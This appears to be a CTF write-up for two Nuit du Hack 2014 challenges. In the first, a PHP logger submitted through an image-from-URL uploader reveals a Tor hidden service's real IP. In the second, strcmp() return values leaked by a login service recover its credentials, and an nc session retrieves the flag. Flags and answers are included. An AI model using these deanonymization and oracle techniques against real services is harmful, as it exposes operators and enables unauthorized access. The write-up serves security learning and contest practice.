Nuit du Hack CTF Quals 2014 - Misc150 and Misc200 Writeup
In this challenge we are provided an hidden service of Thor: http://mq72g4732yorslzf.onion/
Our task is to know which server is hosting this service. The web site offers things like weapons and drugs products but no vulnerabilities to exploit there. Then we noticed an interesting image uploader where you can submit the image from your pc or from an URL. The last option is what we need. If we submit , instead of an emal, a logger that will trace us the IP of the requester and so the IP of the hidden service. Lets set up a logger and upload it on your site you control:
<?php print_r($_SERVER); file_put_contents("file.txt",implode("---",$_SERVER)); ?>
Now go on the upload form and paste down the URL of your site pointing to the logger and submit. Now a file called “file.txt” should appear and inside this you can find the IP of the hidden server: 220.127.116.11
Going throught it it will lead us to the flag:
He started screaming at me saying weird shit I didn’t understand, then he just lookde blank and mumbled: “The flag .. The flag.. It is ‘0hSh1t1r4n0ut0fn00dl35´. And then he just died in front of me. Weird..
The task set up a service where a username and password is asked and if they match the correct it will print the password. The output that comes to the server, if you send invalid username/password, is like: ‘Nope (X)’. That ‘X’ is the return value of strcmp() function between the username/password and your input. So if you for example Submit as username ‘A’ and you receive ‘Nope (13)’ this means that the first character of the real username is ‘4’ beacuse: ‘A’=65 in ascii so 65-13=52 -> ‘4’. If you want further explanation just read strcmp() docs.
root@kaiman:/home/nms$ nc 18.104.22.168 3000 Please enter your username: 4dM1N15TR4T0R Username correct, what is the password? THEpasswordISreallyLONGbutYOUllGETtoTHEendOFitEVENTUALLY Well done! Here is the flag: YoMamaIsLikeHTML,SmallHeadAndHugeBody